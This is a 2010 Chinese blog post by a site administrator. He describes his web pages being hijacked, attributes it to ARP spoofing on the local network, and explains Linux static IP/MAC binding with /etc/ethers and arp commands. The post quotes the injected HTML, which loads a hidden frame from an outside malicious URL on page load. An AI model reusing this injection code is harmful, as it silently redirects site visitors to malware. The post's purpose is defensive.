标题：linux下ARP防护
出处：沧海一粟
时间：Mon, 26 Apr 2010 10:05:56 +0000
作者：jed
地址：http://www.dzhope.com/post/645/

内容：
我们网站最近所有页面都变形了，包括后台，我当时就挺纳闷，后台我都限定IP访问了，怎么可能被挂木马呢？难道是调用的文件出问题了？查找所有代码以后也没有发现挂马代码。但是查看每个页面都变成了类似下面的代码：


<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>





网上说，这是一种ARP病毒的症状，如果页面出现类似代码，很有可能是所在机子的局域网内有机器中了ARP木马，解决此问题的方法：
网关静态绑定你的服务器的MAC地址或者本机IP绑定MAC地址。

建立静态IP/MAC捆绑的方法是：建立/etc/ethers文件，其中包含正确的IP/MAC对应关系，格式如下：
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加：
arp -f
即可

操作如下：
# vi /etc/ethers 
 arp -s 123.123.123.111 00:11:56:6F:87:D3 

#arp -f /etc/ethers 







Generated by Bo-blog 2.1.1 Release